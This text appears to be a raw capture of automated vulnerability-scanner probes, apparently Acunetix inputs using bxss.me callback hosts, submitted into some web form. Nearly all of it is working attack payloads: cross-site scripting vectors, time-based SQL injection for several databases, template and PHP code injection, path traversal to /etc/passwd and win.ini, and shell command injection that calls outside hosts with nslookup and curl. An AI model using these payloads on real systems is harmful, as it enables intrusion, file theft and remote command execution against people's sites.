1<input autofocus onfocus=SF5R(9077)>

�<img zzz onmouseover=SF5R(96131) //�>

1<ScRiPt>SF5R(9781)</sCripT>

1\u003CScRiPt\SF5R(9821)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%53%46%35%52%289746%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9109)>

1<img src=xyz OnErRor=SF5R(9951)>

1<img src=//xss.bxss.me/t/dot.gif onload=SF5R(9324)>

1<body onload=SF5R(9727)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9331'>

1<isindex type=image src=1 onerror=SF5R(9821)>

1<svg

� onload=SF5R(9116);>

1<InvalidTag

>SF5R(9514)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9431></ScRiPt>

1<InvalidTag

>SF5R(9792)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%46%35%52%28%39%35%31%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>SF5R(9834)</script>9834

1<InvalidTag>SF5R(9822)</script>

1<WEEM7B>IJR0B[!+!]</WEEM7B>

1<InvalidTag >SF5R(9527)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx9929%C0%BEz1%C0%BCz2a%90bcxhjl9929

bfg4772%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl4772

19534002

'"()&%<zzz><InvalidTag >SF5R(9759)</ScRiPt>

19089643

1'"()&%<zzz><InvalidTag >SF5R(9730)</ScRiPt>

'"()&%<zzz><InvalidTag >TIAs(9771)</ScRiPt>

1'"()&%<zzz><InvalidTag >TIAs(9319)</ScRiPt>

Mr.

555

@@nW2J4

��%2527%2522\'\"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1J1Xpw3CA')) OR 915=(SELECT 915 FROM PG_SLEEP(15))--

1BrfD09tf') OR 531=(SELECT 531 FROM PG_SLEEP(15))--

1-1)) OR 808=(SELECT 808 FROM PG_SLEEP(15))--

1-1) OR 276=(SELECT 276 FROM PG_SLEEP(15))--

1-1 OR 636=(SELECT 636 FROM PG_SLEEP(15))--

1lpGodsHD')); waitfor delay '0:0:15' --

1DxSRekSX'); waitfor delay '0:0:15' --

12broRdvv'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1*if(now()=sysdate(),sleep(15),0)

-1" OR 3*2>(0+5+645-645) --

-1" OR 3*2<(0+5+645-645) --

-1" OR 3+645-645-1=0+0+0+1 --

-1" OR 2+645-645-1=0+0+0+1 --

-1' OR 3*2>(0+5+793-793) or '5tKVXwNu'='

-1' OR 3*2<(0+5+793-793) or '5tKVXwNu'='

-1' OR 3+793-793-1=0+0+0+1 or '5tKVXwNu'='

-1' OR 2+793-793-1=0+0+0+1 or '5tKVXwNu'='

-1' OR 3*2>(0+5+627-627) --

-1' OR 3*2<(0+5+627-627) --

-1' OR 3+627-627-1=0+0+0+1 --

-1' OR 2+627-627-1=0+0+0+1 --

-1 OR 3*2>(0+5+378-378)

-1 OR 3*2<(0+5+378-378)

-1 OR 3+378-378-1=0+0+0+1

-1 OR 2+378-378-1=0+0+0+1

-1 OR 3*2>(0+5+563-563) --

-1 OR 3*2<(0+5+563-563) --

-1 OR 3+563-563-1=0+0+0+1 --

-1 OR 2+563-563-1=0+0+0+1 --

@@4yjbF

��%2527%2522\'\"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1C9CjMQCK')) OR 918=(SELECT 918 FROM PG_SLEEP(15))--

14x9lTv41') OR 605=(SELECT 605 FROM PG_SLEEP(15))--

1pUHn40nM' OR 903=(SELECT 903 FROM PG_SLEEP(15))--

1-1)) OR 951=(SELECT 951 FROM PG_SLEEP(15))--

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

555

Mr.

555

Mr.

555

Socket.gethostbyname('hittf'+'kfkncaec176ee.bxss.me.')[3].to_s)+'

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

../555

Mr.

"+"A".concat(70-3).concat(22*4).concat(113).concat(74).concat(101).concat(67)+(require"socket"

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

Mr.

${@print(md5(31337))}

Mr.

Mr.

555

Mr.

555

Mr.

Mr.

555

Mr.

555

Mr.

555

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1*if(now()=sysdate(),sleep(15),0)

-1" OR 3*2>(0+5+113-113) --

-1" OR 3*2<(0+5+113-113) --

-1" OR 3+113-113-1=0+0+0+1 --

-1" OR 2+113-113-1=0+0+0+1 --

-1' OR 3*2>(0+5+328-328) or 'bU6k0E95'='

-1' OR 3*2<(0+5+328-328) or 'bU6k0E95'='

-1' OR 3+328-328-1=0+0+0+1 or 'bU6k0E95'='

-1' OR 2+328-328-1=0+0+0+1 or 'bU6k0E95'='

-1' OR 3*2>(0+5+996-996) --

-1' OR 3*2<(0+5+996-996) --

-1' OR 3+996-996-1=0+0+0+1 --

-1' OR 2+996-996-1=0+0+0+1 --

-1 OR 3*2>(0+5+942-942)

-1 OR 3*2<(0+5+942-942)

-1 OR 3+942-942-1=0+0+0+1

-1 OR 2+942-942-1=0+0+0+1

-1 OR 3*2>(0+5+182-182) --

-1 OR 3*2<(0+5+182-182) --

-1 OR 3+182-182-1=0+0+0+1 --

-1 OR 2+182-182-1=0+0+0+1 --

Mr.

555

@@uj7xy

��%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1bQZXtS7Y')) OR 686=(SELECT 686 FROM PG_SLEEP(15))--

1sLsIHl9m') OR 910=(SELECT 910 FROM PG_SLEEP(15))--

1J6rYxCC8' OR 301=(SELECT 301 FROM PG_SLEEP(15))--

1-1)) OR 52=(SELECT 52 FROM PG_SLEEP(15))--

1-1) OR 448=(SELECT 448 FROM PG_SLEEP(15))--

1-1 OR 695=(SELECT 695 FROM PG_SLEEP(15))--

1<aYIiXfK<

1wzcz2mr8')); waitfor delay '0:0:15' --

1<img sRc='http://attacker-9706/log.php?

1<a8IV6TI x=9526>

1<ifRAme sRc=9612.com></IfRamE>

1<WKDB9H>SAH9P[!+!]</WKDB9H>

1Yychd

Mr.

555

1}body{zzz:Expre/**/SSion(ri1B(9608))}

<a HrEF=jaVaScRiPT:>

1UeYJTniS'); waitfor delay '0:0:15' --

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=ri1B(9859)>

�<img zzz onmouseover=ri1B(96581) //�>

1<ScRiPt>ri1B(9883)</sCripT>

1\u003CScRiPt\ri1B(9560)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%72%69%31%42%289666%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9857)>

1<apToRoP<

1<img src=xyz OnErRor=ri1B(9597)>

1<img sRc='http://attacker-9417/log.php?

1<img src=//xss.bxss.me/t/dot.gif onload=ri1B(9540)>

1LwQ33nY6'; waitfor delay '0:0:15' --

1<aBFspuq x=9536>

1<ifRAme sRc=9389.com></IfRamE>

1<body onload=ri1B(9582)>

1<WFFIXX>6YYHG[!+!]</WFFIXX>

1GlwkY

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9533'>

1}body{zzz:Expre/**/SSion(KhE4(9085))}

1<isindex type=image src=1 onerror=ri1B(9086)>

1<input autofocus onfocus=KhE4(9987)>

1<svg

�<img zzz onmouseover=KhE4(99101) //�>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9569></ScRiPt>

1<InvalidTag

1<ScRiPt>KhE4(9041)</sCripT>

1\u003CScRiPt\KhE4(9884)\u003C/sCripT\u003E

1-1 waitfor delay '0:0:15' --

%31%3C%53%63%52%69%50%74%20%3E%4B%68%45%34%289909%29%3C%2F%73%43%72%69%70%54%3E

1<InvalidTag

1<img/src=">" onerror=alert(9566)>

1<img src=xyz OnErRor=KhE4(9724)>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%72%69%31%42%28%39%30%32%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<img src=//xss.bxss.me/t/dot.gif onload=KhE4(9589)>

1<InvalidTag>ri1B(9189)</script>9189

1<body onload=KhE4(9748)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9344'>

1<InvalidTag>ri1B(9041)</script>

1<isindex type=image src=1 onerror=KhE4(9390)>

1<svg

� onload=KhE4(9497);>

1<WHFRNH>HOTON[!+!]</WHFRNH>

1<InvalidTag

>KhE4(9359)</ScRiPt>

1<InvalidTag >ri1B(9893)</ScRiPt>

1-1)); waitfor delay '0:0:15' --

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9717></ScRiPt>

1<InvalidTag

>KhE4(9673)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4B%68%45%34%28%39%30%31%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

dfb${98991*97996}::.x

1<InvalidTag>KhE4(9601)</script>9601

1<InvalidTag>KhE4(9460)</script>

dfb[[${98991*97996}]]xca

1<WS8H26>QQBNJ[!+!]</WS8H26>

dfb{{98991*97996}}xca

1<InvalidTag >KhE4(9499)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

19267843

1-1); waitfor delay '0:0:15' --

'"()&%<zzz><InvalidTag >do6b(9301)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

1'"()&%<zzz><InvalidTag >do6b(9851)</ScRiPt>

<%={{={@{#{${dfb}}%>

/\xfs.bxss.me?hkbakels.com.hk

bfgx10364%C0%BEz1%C0%BCz2a%90bcxhjl10364

//xfs.bxss.me?hkbakels.com.hk

bfg3063%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3063

bfgx2632%C0%BEz1%C0%BCz2a%90bcxhjl2632

xfs.bxss.me?hkbakels.com.hk

19370031

http://xfs.bxss.me?hkbakels.com.hk

'"()&%<zzz><InvalidTag >KhE4(9135)</ScRiPt>

954604

xfs.bxss.me

1'"()&%<zzz><InvalidTag >KhE4(9853)</ScRiPt>

bfg5027%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5027

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

`(nslookup -q=cname hitrestjizzfa7790b.bxss.me||curl hitrestjizzfa7790b.bxss.me)`

'"()&%<zzz><InvalidTag >KhE4(9090)</ScRiPt>

|(nslookup -q=cname hittcpnyyokqd9ffed.bxss.me||curl hittcpnyyokqd9ffed.bxss.me)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

<!--

1'"()&%<zzz><InvalidTag >KhE4(9702)</ScRiPt>

&(nslookup -q=cname hitdqhuunuypt83b0a.bxss.me||curl hitdqhuunuypt83b0a.bxss.me)&'\"`0&(nslookup -q=cname hitdqhuunuypt83b0a.bxss.me||curl hitdqhuunuypt83b0a.bxss.me)&`'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'"

&nslookup -q=cname hitoqlxumvlzw572c0.bxss.me&'\"`0&nslookup -q=cname hitoqlxumvlzw572c0.bxss.me&`'

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

$(nslookup -q=cname hitgbglkzneuu25f54.bxss.me||curl hitgbglkzneuu25f54.bxss.me)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

(nslookup -q=cname hitktempznmbx778f3.bxss.me||curl hitktempznmbx778f3.bxss.me))

..\..\..\..\..\..\..\..\windows\win.ini

bxss.me

|echo xhsonc$()\ unrrbj\nz^xyu||a #' |echo xhsonc$()\ unrrbj\nz^xyu||a #|" |echo xhsonc$()\ unrrbj\nz^xyu||a #

xfs.bxss.me

c:/windows/win.ini

&echo mzwfro$()\ qkolaq\nz^xyu||a #' &echo mzwfro$()\ qkolaq\nz^xyu||a #|" &echo mzwfro$()\ qkolaq\nz^xyu||a #

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

/etc/shells

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

/../../../../../../../../../../boot.ini

http://bxss.me/t/fit.txt%3F.jpg

echo cecrwy$()\ pntmaf\nz^xyu||a #' &echo cecrwy$()\ pntmaf\nz^xyu||a #|" &echo cecrwy$()\ pntmaf\nz^xyu||a #

../../../../../../../../../../windows/win.ini%00.jpg

Http://bxss.me/t/fit.txt

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

C:\WINDOWS\system32\drivers\etc\hosts

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

file:///etc/passwd

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

../../../../../../../../../../../../../../windows/win.ini

'+'A'.concat(70-3).concat(22*4).concat(105).concat(84).concat(101).concat(75)+(require'socket'

Socket.gethostbyname('hitqd'+'gudsfgdnab727.bxss.me.')[3].to_s)+'

../../../../../../../../../../../../../../etc/passwd

"+"A".concat(70-3).concat(22*4).concat(117).concat(79).concat(98).concat(82)+(require"socket"

Socket.gethostbyname("hitiv"+"imorzjyf754b2.bxss.me.")[3].to_s)+"

"+response.write(9900590*9843377)+"

'+response.write(9900590*9843377)+'

bxss.me/t/xss.html?%00

response.write(9900590*9843377)

HttP://bxss.me/t/xss.html?%00

'+response.write(9371541*9862677)+'

WEB-INF\web.xml

${9999211+9999411}

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

WEB-INF/web.xml

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

;(nslookup -q=cname hitdxyszqglgs19dca.bxss.me||curl hitdxyszqglgs19dca.bxss.me)|(nslookup -q=cname hitdxyszqglgs19dca.bxss.me||curl hitdxyszqglgs19dca.bxss.me)&(nslookup -q=cname hitdxyszqglgs19dca.bxss.me||curl hitdxyszqglgs19dca.bxss.me)

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

`(nslookup -q=cname hithkrwuxehnua1ac3.bxss.me||curl hithkrwuxehnua1ac3.bxss.me)`

..\..\..\..\..\..\..\..\windows\win.ini

|(nslookup -q=cname hitdpwltoidsh4c7bf.bxss.me||curl hitdpwltoidsh4c7bf.bxss.me)

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

<esi:include src="http://bxss.me/rpb.png"/>

/../../../../../../../../../../boot.ini

../../../../../../../../../../windows/win.ini%00.jpg

&(nslookup -q=cname hityiesuwruhu57f6a.bxss.me||curl hityiesuwruhu57f6a.bxss.me)&'\"`0&(nslookup -q=cname hityiesuwruhu57f6a.bxss.me||curl hityiesuwruhu57f6a.bxss.me)&`'

C:\WINDOWS\system32\drivers\etc\hosts

&nslookup -q=cname hitwuktbzkzvzc80d7.bxss.me&'\"`0&nslookup -q=cname hitwuktbzkzvzc80d7.bxss.me&`'

file:///etc/passwd

$(nslookup -q=cname hitbdjlxngfdc2eb4b.bxss.me||curl hitbdjlxngfdc2eb4b.bxss.me)

1*if(now()=sysdate(),sleep(15),0)

<esi:include src="http://bxss.me/rpb.png"/>

(nslookup -q=cname hitisrowywzkyd8a27.bxss.me||curl hitisrowywzkyd8a27.bxss.me))

../../../../../../../../../../../../../../windows/win.ini

|echo glezah$()\ qoiwct\nz^xyu||a #' |echo glezah$()\ qoiwct\nz^xyu||a #|" |echo glezah$()\ qoiwct\nz^xyu||a #

&echo zsmipr$()\ xklpsn\nz^xyu||a #' &echo zsmipr$()\ xklpsn\nz^xyu||a #|" &echo zsmipr$()\ xklpsn\nz^xyu||a #

../../../../../../../../../../../../../../etc/passwd

echo dkbule$()\ nxxqkb\nz^xyu||a #' &echo dkbule$()\ nxxqkb\nz^xyu||a #|" &echo dkbule$()\ nxxqkb\nz^xyu||a #

/../../../../../../../../../../windows/system32/BITSADMIN.exe

uazgCHVD

-1" OR 3*2>(0+5+489-489) --

/../../../../../../../../../../windows/system32/BITSADMIN.exe

-1" OR 3*2<(0+5+489-489) --

-1" OR 3+489-489-1=0+0+0+1 --

'.print(md5(31337)).'

hRm9QJYR

-1" OR 2+489-489-1=0+0+0+1 --

${@print(md5(31337))}\

${@print(md5(31337))}

-1' OR 3*2>(0+5+982-982) or 'bIFFTwoj'='

";print(md5(31337));$a="

-1' OR 3*2<(0+5+982-982) or 'bIFFTwoj'='

';print(md5(31337));$a='

-1' OR 3+982-982-1=0+0+0+1 or 'bIFFTwoj'='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

"||sleep(27*1000)*qmtwhh||"

-1' OR 2+982-982-1=0+0+0+1 or 'bIFFTwoj'='

'||sleep(27*1000)*fivxei||'

-1' OR 3*2>(0+5+541-541) --

"&&sleep(27*1000)*uchscq&&"

-1' OR 3*2<(0+5+541-541) --

'&&sleep(27*1000)*arxztu&&'

-1' OR 3+541-541-1=0+0+0+1 --

&n948800=v950367

'"()

-1' OR 2+541-541-1=0+0+0+1 --

-1 OR 3*2>(0+5+240-240)

-1 OR 3*2<(0+5+240-240)

&n978883=v914110

-1 OR 3+48-48-1=0+0+0+1 --

)

-1 OR 2+48-48-1=0+0+0+1 --

".gethostbyname(lc("hitsu"."zfmxfykd38ef4.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(87).chr(100).chr(85)."

'.gethostbyname(lc('hitio'.'ujvfyrgn9123a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(84).chr(122).chr(68).'

'.print(md5(31337)).'

${@print(md5(31337))}\

"||sleep(271000)aaftwp||"

${@print(md5(31337))}

'||sleep(271000)ogxcom||'

";print(md5(31337));$a="

"&&sleep(271000)zeguwl&&"

^(#$!@#$)(()))******

';print(md5(31337));$a='

'&&sleep(271000)gyjkgm&&'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

!(()&&!|||

".gethostbyname(lc("hitgy"."pnmphxgl08150.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(74).chr(104).chr(72)."

'.gethostbyname(lc('hitvo'.'hcllwuqpe3a1e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(114).chr(67).'

'"()

1<aqGgwUL<

1<aJMjnP7<

1<img sRc='http://attacker-9503/log.php?

1<img sRc='http://attacker-9994/log.php?

1<awdmxrM x=9749>

1<a6AQpef x=9353>

1<ifRAme sRc=9451.com></IfRamE>

�<img zzz onmouseover=lA0Q(90321) //�>

�<img zzz onmouseover=ckfC(90101) //�>

1<ScRiPt>lA0Q(9294)</sCripT>

1<ScRiPt>ckfC(9514)</sCripT>

1\u003CScRiPt\lA0Q(9836)\u003C/sCripT\u003E

1\u003CScRiPt\ckfC(9414)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%6C%41%30%51%289872%29%3C%2F%73%43%72%69%70%54%3E

